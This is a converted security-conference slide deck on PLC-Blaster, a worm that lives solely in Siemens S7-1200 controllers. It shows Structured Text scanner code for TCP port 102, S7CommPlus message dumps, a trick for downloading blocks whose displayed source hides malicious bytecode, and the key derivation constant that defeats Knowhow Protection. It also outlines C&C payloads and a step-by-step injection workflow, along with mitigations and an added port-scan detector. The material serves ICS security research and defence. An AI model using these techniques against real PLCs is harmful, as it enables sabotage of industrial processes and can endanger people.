## PLC-BLASTER
###### A Worm Living Solely in the PLC
-----
##### Linux Security
##### Pentesting Embedded Systems
##### Pentesting RFID Systems
##### Pentesting Industrial Control Systems
-----
##### Built for small applications
##### 50kb RAM
##### 1MB persistent memory
##### Built-in Ethernet
##### V3.0 & TIAv11
-----
##### OB (OrganizationBlock): Entry point
##### FB (FunctionBlock): Class with one method
##### SFB (SystemFunctionBlock): Library
##### FC (Function): Function
##### SFC (SystemFunction): Library
##### DB (DataBlock): Global memory
-----
###### Ladder Diagram
###### Function Block Diagram
###### Instruction List
###### Sequential Function Chart
###### Structured Text
-----
##### Target discovery?
##### Carrier
##### Activation
##### Payloads
-----
##### TCP port 102 is open on all S7-PLCs
##### Implement a portscanner
###### – TCON: Open a new TCP connection
###### – TDISCON: Close a TCP connection
-----
```
IF "data".con_state = 10 THEN
    "TCON_DB"(REQ:="data".action,
              ID:=1,
              DONE=>"data".con_done,
              BUSY=>"data".con_busy,
              ERROR=>"data".con_error,
              STATUS=>"data".con_status,
              CONNECT:="data".con_param);
    IF "data".con_done = True THEN
        "data".con_state := 20;
        "data".con_timeout_counter := 0;
    ELSE
        "data".con_timeout_counter := "data".con_timeout_counter + 1;
        IF "data".con_timeout_counter > 200 THEN
            "data".con_state := 0;
        END_IF;
    END_IF;
    GOTO CYCLE_END;
END_IF;
```
-----
```
IF "data".con_state = 0 THEN
    "TDISCON_DB"(REQ:="data".action,
                 ID:=1,
                 DONE=>"data".con_done,
                 BUSY=>"data".con_busy,
                 ERROR=>"data".con_error,
                 STATUS=>"data".con_status);
    IF "data".con_error = True OR "data".con_done = True THEN
        "data".con_param.REM_STADDR[4] := ("data".con_param.REM_STADDR[4] + 1) MOD 255;
        "data".con_timeout_counter := 0;
        "data".con_state := 10;
    END_IF;
    GOTO CYCLE_END;
END_IF;
```
-----
##### Target discovery ✓
###### – Portscanner (TCP 102); TCON, TDISCON
##### Carrier?
##### Activation
##### Payloads
-----
##### Program transfer via TCP to the PLC
##### Implement the transfer protocol
###### – TSEND, TRCV
-----
##### S7CommPlus
###### – Binary
###### – Proprietary
###### – Huge differences compared to the old S7-300/400 protocol
###### – Modified in S7-1200v4 and S7-1500
###### – Transfer of programs
###### – Start/Stop CPU
###### – Read/Write process variables
###### Protocol stack (figure): S7CommPlus / ISO8073 Class 0 / TPKT / TCP / IP
-----
###### Message 1: Connection setup
```
00000023 03 00 00 df 02 f0 80 72 01 00 d0 31 00 00 04 ca .......r ...1....
00000033 00 00 00 02 00 00 01 20 36 00 00 01 1d 00 04 00 ....... 6.......
00000043 00 00 00 00 a1 00 00 00 d3 82 1f 00 00 a3 81 69 ........ .......i
00000053 00 15 16 53 65 72 76 65 72 53 65 73 73 69 6f 6e ...Serve rSession
00000063 5f 33 33 32 33 34 41 37 41 a3 82 21 00 15 2c 31 _33234A7 A..!..,1
00000073 3a 3a 3a 36 2e 30 3a 3a 54 43 50 2f 49 50 20 2d :::6.0:: TCP/IP -
00000083 3e 20 49 6e 74 65 6c 28 52 29 20 50 52 4f 2f 31 > Intel( R) PRO/1
00000093 30 30 30 20 4d 54 20 44 2e 2e 2e a3 82 28 00 15 000 MT D .....(..
000000A3 00 a3 82 29 00 15 00 a3 82 2a 00 15 0f 4d 41 49 ...).... .*...MAI
000000B3 4b 2d 50 43 5f 32 32 33 30 39 30 36 a3 82 2b 00 K-PC_223 0906..+.
000000C3 04 01 a3 82 2c 00 12 00 2d c6 c0 a3 82 2d 00 15 ....,... -....-..
000000D3 00 a1 00 00 00 d3 81 7f 00 00 a3 81 69 00 15 15 ........ ....i...
000000E3 53 75 62 73 63 72 69 70 74 69 6f 6e 43 6f 6e 74 Subscrip tionCont
000000F3 61 69 6e 65 72 a2 a2 00 00 00 00 72 01 00 00    ainer... ...r...
```
###### Header fields of message 1 (annotation from the slide)
|TPKT|ISO8073|Magic|Version|Len|Type|Reserved|Sub-Type|Seq no.|
|---|---|---|---|---|---|---|---|---|
|03 00 00 df|02 f0 80|72|01|00 d0|31|00 00|04 ca|00 00 00 02|
###### Frame-End-Delimiter (last bytes of the dump)
-----
###### Attribute-Block start
```
a3 81 69 ........ .......i
00000053 00 15 16 53 65 72 76 65 72 53 65 73 73 69 6f 6e ...Serve rSession
00000063 5f 33 33 32 33 34 41 37 41 _33234A7 A
```
|Attribut-Block start|ID|Datatype|Format?|Len|Value|
|---|---|---|---|---|---|
|a3|81 69|00|15|16|53 65 72 76 65 72 53 65 73 73 69 6f 6e 5f 33 33 32 33 34 41 37 41|
###### Value
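The attribute blocks annotated above can be walked by a small dissector. This is an added example, not code from the slides or from PLC-Blaster; it assumes, from the annotated bytes only, that 0xa3 opens a block, that ID and length are base-128 integers whose high bit marks a following byte, and that the byte pair 00 15 precedes every string value. Any other datatype stops the parse, because the slides do not show how those values are laid out.

```python
"""Dissect the S7CommPlus attribute blocks annotated on the slides.

Added example, not from the original deck. Assumed layout (from the
annotated bytes): a3 | ID (varint) | 00 15 (datatype, taken to mean
"string") | length (varint) | value. In a varint a set high bit means
another byte follows: 81 69 -> 233, 16 -> 22.
"""

ATTR_START = 0xA3
STRING_TYPE = (0x00, 0x15)  # assumption: pair seen before every string value

# Bytes copied from the deck's hexdump of message 1 (offset 0x4d onward),
# cut just after the first attribute whose datatype is not 00 15.
SAMPLE = bytes.fromhex(
    "a3 81 69 00 15 16 53 65 72 76 65 72 53 65 73 73 69 6f 6e "
    "5f 33 33 32 33 34 41 37 41 a3 82 21 00 15 2c 31 "
    "3a 3a 3a 36 2e 30 3a 3a 54 43 50 2f 49 50 20 2d "
    "3e 20 49 6e 74 65 6c 28 52 29 20 50 52 4f 2f 31 "
    "30 30 30 20 4d 54 20 44 2e 2e 2e a3 82 28 00 15 "
    "00 a3 82 29 00 15 00 a3 82 2a 00 15 0f 4d 41 49 "
    "4b 2d 50 43 5f 32 32 33 30 39 30 36 a3 82 2b 00 04 01"
)


def read_varint(buf: bytes, pos: int) -> tuple[int, int]:
    """Decode a big-endian base-128 integer; return (value, next position)."""
    value = 0
    while True:
        b = buf[pos]
        pos += 1
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            return value, pos


def parse_attributes(buf: bytes, pos: int = 0) -> list[tuple[int, str]]:
    """Return (ID, value) pairs for consecutive string attributes.

    Stops at the first block with another datatype, whose value layout
    the slides do not show.
    """
    attrs = []
    while pos < len(buf) and buf[pos] == ATTR_START:
        attr_id, pos = read_varint(buf, pos + 1)
        if pos + 2 > len(buf) or (buf[pos], buf[pos + 1]) != STRING_TYPE:
            break
        length, pos = read_varint(buf, pos + 2)
        attrs.append((attr_id, buf[pos:pos + length].decode("ascii")))
        pos += length
    return attrs
```

`parse_attributes(SAMPLE)` yields five string attributes, starting with ID 233 (`ServerSession_33234A7A`) and ID 289 (the `TCP/IP -> Intel(R) PRO/1000 MT D...` string), and stops at the block with datatype 00 04.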
-----
```
a3 81 69 ........ .......i
00000053 00 15 16 53 65 72 76 65 72 53 65 73 73 69 6f 6e ...Serve rSession
00000063 5f 33 33 32 33 34 41 37 41 _33234A7 A
```
###### High bit set: another byte is following
###### 81 69 (base 16) = 10000001 01101001 (base 2) → 233 (base 10)
###### 16 (base 16) = 00010110 (base 2) → 22 (base 10)
-----
###### Message 2: Connection setup
```
000000A3 a2 00 00 00 00 72 01 00 00
```
###### 22 (base 16) + 80 (base 16) = A2 (base 16)
-----
###### Message 3: Connection setup
```
0000010B 03 00 00 8c 02 f0 80 72 02 00 7d 31
0000012B 32 01 00 17 00 00 01 3a 82 3b 00 04
0000018B 00 04 00 00 00 00 00 00 72 02 00 00
```
###### 22 (base 16) + 80 (base 16) = A2 (base 16)
-----
###### Message: Download block
|8a 32|00 01|
|---|---|
-----
##### Transfer Attributes:
###### – Some are used by the PLC
###### – Some are used by TIA in case of program retrieval
###### LastModified (0x9315)
###### LoadMemorySize (0x9316)
###### IdentES (0x9311)
###### WorkingMemorySize (0x9313)
###### Comment (0xa140)
###### InterfaceModified (0x936f)
###### InterfaceDescription (0x9370)
###### LineComments (0x9372)
###### BlockNumber (0x9359)
###### BlockLanguage (0x935b)
###### KnowhowProtected (0x935c)
###### Unlinked (0x935f)
###### Fprotection (0x9360)
###### RuntimeModified (0x9361)
- BodyDescription (0x9365)
- Binding (0x984f)
###### OptimizeInfo (0x9369)
###### TOblockSetNumber (0x9c23)
###### TypeInfo (0xa362)
- Code (0x9414)
- ParameterModified (0x9415)
- NetworkComments (0x9418)
- NetworkTitles (0x9419)
- CalleeList (0x941a)
- InterfaceSignature (0x941b)
- DebugInfo (0x941d)
- LocalErrorHandling (0x941e)
- LongConstants (0x941f)
- intRefData (0x9417)
-----
##### Data redundancy creates attack surface
```
00000901 03 00 04 00 02 f0 00 72 02 05 a9 31 00 00 04 ca .......r ...1....
00000911 00 00 00 1d 00 00 03 a2 34 00 00 00 03 00 04 00 ........ 4.......
00000921 00 00 00 00 a1 8a 32 00 01 94 57 20 00 a3 81 69 ......2. ..W ...i
. . . .
00000C71 53 77 65 65 70 20 28 43 79 63 6c 65 29 22 00 a3 Sweep (C ycle)"..
00000C81 93 59 00 03 00 01 a3 93 5a 00 01 00 a3 93 5b 00 .Y...... Z.....[.
```
###### Blocknumber: sent in the download-block header (8a 32 00 01) and again in the BlockNumber attribute (a3 93 59 00 03 00 01)
|03|00 01|
|---|---|
###### Which one is evaluated by Siemens? Both!
-----
##### Allows you to download hidden blocks
##### Choose an existing blocknumber
##### TIA Portal recognizes only the original block
##### Not working with data blocks
-----
##### The code is transferred in two variants
###### Source code in XML displayed by TIA
```
. . .
```
###### Byte code executed by the PLC
```
02 4c 00 00 e0 02 4c 04 00 e0 02 4c 08 00 e0 02 4c 0c 00 e0
02 4c 10 00 e0 02 4c 14 00 f8 18 58 02 f8 18 58 06 18 40 01
f8 70 00 04 01 02 1a 40 05 6f 00 2c 7c 00 01 6c 01 68 00 68
01 14 40 01
```
-----
##### Allows you to make your program source code look unsuspicious
##### But actually malicious binary code is executed
-----
##### Some attribute blocks can be left out
##### You don't need to ship your worm's source code
##### Reduce the amount of data
-----
##### Implement the worm using TIA:
###### – Connection setup
###### – Anti-replay protection
###### – Create empty data blocks for messages
##### Transfer the worm to the PLC with TIA and capture pcaps
##### Retrieve the messages from the pcaps
##### Store the messages in the empty DBs
##### Inject the worm with your own tool
-----
##### Target discovery ✓
###### – Portscanner (TCP 102); TCON, TDISCON
##### Carrier ✓
###### – Implement the S7-Protocol; TSEND, TRCV
##### Activation?
##### Payloads
-----
##### OB (OrganizationBlock): int main()
##### Additional OBs are supported
##### OBs are executed sequentially
##### Original user program is untouched
-----
##### Target discovery ✓
###### – Portscanner (TCP 102); TCON, TDISCON
##### Carrier ✓
###### – Implement the S7-Protocol; TSEND, TRCV
##### Activation ✓
###### – Built-in
##### Payloads
-----
##### DoS
##### Arbitrary manipulation of outputs
##### TCP-Functions
###### – C&C-Server
###### – Proxy
##### ...
-----
##### Target discovery ✓
###### – Portscanner (TCP 102); TCON, TDISCON
##### Carrier ✓
###### – Implement the S7-Protocol; TSEND, TRCV
##### Activation ✓
###### – Built-in
##### Payloads ✓
###### – A lot of possibilities
-----
###### Injection (figure: Attacker, C&C Server)
-----
###### Spread (figure: Attacker, C&C Server)
-----
###### Connect back to the C&C Server (figure: Attacker, C&C Server)
-----
##### Program execution is stopped
###### – Approximately 10s
##### Generates a log entry in the PLC
##### Possible worm improvements: patch existing OB1
###### – Worm is more complex
-----
##### Memory usage
###### – 38,5kb RAM
###### – 216,6kb persistent memory
|Model|RAM|Persistent Memory|
|---|---|---|
|S7-1211|50kb (77%)|1MB (21%)|
|S7-1212|75kb (51%)|1MB (5 %)|
|S7-1214|100kb (38%)|4MB (5 %)|
|S7-1215|125kb (30%)|4MB (5 %)|
|S7-1217|150kb (25%)|4MB (5 %)|
-----
##### Cycle time
###### – Default cycle time: 150ms
###### – Worm: max 7ms (4,7%)
-----
##### Remove the worm:
###### – Factory reset of the PLC
###### – Override the worm OB
##### The TIA Portal recognizes the worm
-----
##### S7-1200 provides 3 protection mechanisms:
###### – Knowhow Protection
###### – Copy Protection
###### – Access Protection
-----
##### Prevents unauthorized reading or modification of the code
##### Password protection
##### Source code is AES encrypted
###### Knowhow Attribute Block
```
0000 A3 93 5C 00 17 00 00 0D 77 9A 78 00 0B 00 01 9A .......w.x......
0010 79 10 02 14 E8 F9 7F BA 91 04 D1 EA 50 47 94 8E y...........PG..
0020 6D FB 67 FA CD 9F 5B 73 00                      m.g...[s.
```
###### SHA-1 hash of password
###### Enable-Flag
-----
##### How to disable the Knowhow Protection?
###### – Set enable flag to:
```
0x00, 0x00
```
##### Problem: source code is still AES encrypted
##### How is the AES key generated?
-----
##### Key derived from the hash:
```
K = truncate128Bit(SHA-1 HASH) XOR M
M = 0x28,0x6f,0x76,0x5c,0x6e,0x3b,0x1e,0x4c,
    0xd0,0x8e,0x42,0x31,0x43,0x7b,0x8e,0xbf
```
##### Siemens Security Advisory: SSA-833048
-----
##### Knowhow Protection is ineffective:
###### – Broken
###### – Only protects existing POUs
-----
##### Restricts the program for use only with a specific PLC
##### Change of serial number possible
##### Attribute Block not evaluated by the PLC (client-side protection)
##### Ineffective
##### Siemens Security Advisory: SSA-833048
###### Copy Attribute Block (figure: serial number)
-----
##### Limits S7CommPlus features
###### – By password
##### Works
##### By default disabled
|Function|Off|Write Protection|Write/Read Protection|
|---|---|---|---|
|Start/Stop CPU|y|n|n|
|Transfer Program to PLC|y|n|n|
|Retrieve Program from PLC|y|y|n|
|Edit Output/Input/Memory|y|y|y|
|Read Identification|y|y|y|
|Assign IP-Address|y|y|y|
|Set time of day|y|n|n|
|Reset|y|n|n|
-----
##### Vendor
###### – Access protection enabled by default
###### – Integrity protection using checksums
###### – Disable connections via TCON to port 102
##### User
###### – Enable the access protection
###### – Firewall restrictions (PLC opens the connection)
-----
##### PLC features required by the worm:
###### – Industrial Ethernet
###### – Program transfer via TCP to the PLC
###### – Programmable TCP functions
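The user-side recommendation above rests on the fact that the PLC itself opens the port-102 connections, so firewall or flow logs can see a controller sweeping its subnet. The following is an added detection example, not code from the deck or from PLC-Blaster; the log format, the addresses and the threshold are constructed assumptions.

```python
"""Flag a controller that sweeps its subnet for TCP port 102.

Added detection example, not from the original deck. PLC-Blaster finds
targets with TCON to port 102 while stepping the last address octet
((REM_STADDR[4] + 1) MOD 255), so the signal is one PLC opening
connections to port 102 on many different peers. Log format and
threshold are assumptions; the records below are constructed.
"""
from collections import defaultdict

SCAN_THRESHOLD = 8  # assumption: distinct port-102 targets per source before alerting

# Constructed flow records, one per line: "epoch src dst dport outcome".
# 192.168.0.10 plays the infected PLC, 192.168.0.200 an engineering PC.
CONSTRUCTED_LOG = "\n".join(
    [f"14560000{i:02d} 192.168.0.10 192.168.0.{11 + i} 102 rejected" for i in range(12)]
    + [
        "1456000020 192.168.0.200 192.168.0.10 102 established",  # TIA Portal to the PLC
        "1456000021 192.168.0.200 192.168.0.10 102 established",
        "1456000022 192.168.0.10 192.168.0.50 502 established",   # Modbus/TCP, not port 102
    ]
)


def parse_flows(text: str):
    """Yield (timestamp, src, dst, dport, outcome) for each record."""
    for line in text.splitlines():
        ts, src, dst, dport, outcome = line.split()
        yield float(ts), src, dst, int(dport), outcome


def find_port102_scanners(text: str, threshold: int = SCAN_THRESHOLD) -> dict[str, list[str]]:
    """Map each source that touched port 102 on >= threshold distinct hosts
    to the sorted list of those hosts. Rejected attempts count as well:
    the sweep itself is the indicator, not a successful transfer."""
    targets: dict[str, set[str]] = defaultdict(set)
    for _, src, dst, dport, _ in parse_flows(text):
        if dport == 102:
            targets[src].add(dst)
    return {src: sorted(dsts) for src, dsts in targets.items() if len(dsts) >= threshold}


if __name__ == "__main__":
    for src, dsts in find_port102_scanners(CONSTRUCTED_LOG).items():
        print(f"{src} contacted port 102 on {len(dsts)} hosts: {dsts[0]} .. {dsts[-1]}")
```

On the constructed log only 192.168.0.10 is reported (12 distinct targets); the engineering PC talking to a single PLC stays below the threshold.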
-----
###### All leading vendors supporting Industrial Ethernet and TCP/UDP transfer in their PLCs
###### All leading vendors supporting additionally TCP/IP functions
###### ● = tested
|Vendor|Product|Ethernet|Transfer TCP/UDP|TCP/IP Functions|
|---|---|---|---|---|
|Siemens|S7-300|Yes|Yes|Yes|
|Siemens|S7-400|Yes|Yes|Yes|
|Siemens ●|S7-1200|Yes|Yes|Yes|
|Siemens|S7-1500|Yes|Yes|Yes|
|Mitsubishi Electric ●|MELSEC iQ-R|Yes|Yes|Yes|
|Mitsubishi Electric|MELSEC iQ-F|Yes|Yes|Yes|
|Mitsubishi Electric ●|MELSEC-Q|Yes|Yes|Yes|
|Mitsubishi Electric|MELSEC-L|Yes|Yes|Yes|
|Mitsubishi Electric|MELSEC-F|Yes|Yes|No|
|Mitsubishi Electric|MELSEC-QS/WS|Yes|Yes|No|
|Schneider Electric|Modicon Easy M|No|No|No|
|Schneider Electric|Modicon M|Yes|Yes|No|
|Schneider Electric|Modicon LM|Yes|Yes|No|
|Schneider Electric|Modicon Premium|Yes|Yes|No|
|Schneider Electric|Modicon Quantum|Yes|Yes|No|
|Schneider Electric|Preventa XPS Quantum|Yes|Yes|No|
|Rockwell Automation|ControlLogix|Yes|Yes|Yes|
|Rockwell Automation|CompactLogix|Yes|Yes|Yes|
|Rockwell Automation|MicroLogix|Yes|Yes|Yes|
|Rockwell Automation|SmartGuard 600|Yes|Yes|No|
|Rockwell Automation|SLC 500|Yes|Yes|Yes|
|Rockwell Automation|PLC-5|Yes|Yes|Yes|
-----
##### Analysis of more PLC vendors and models
##### Infection via fieldbus protocols
-----
# Q&A
###### http://opensource-security.de
###### info@os-s.de
-----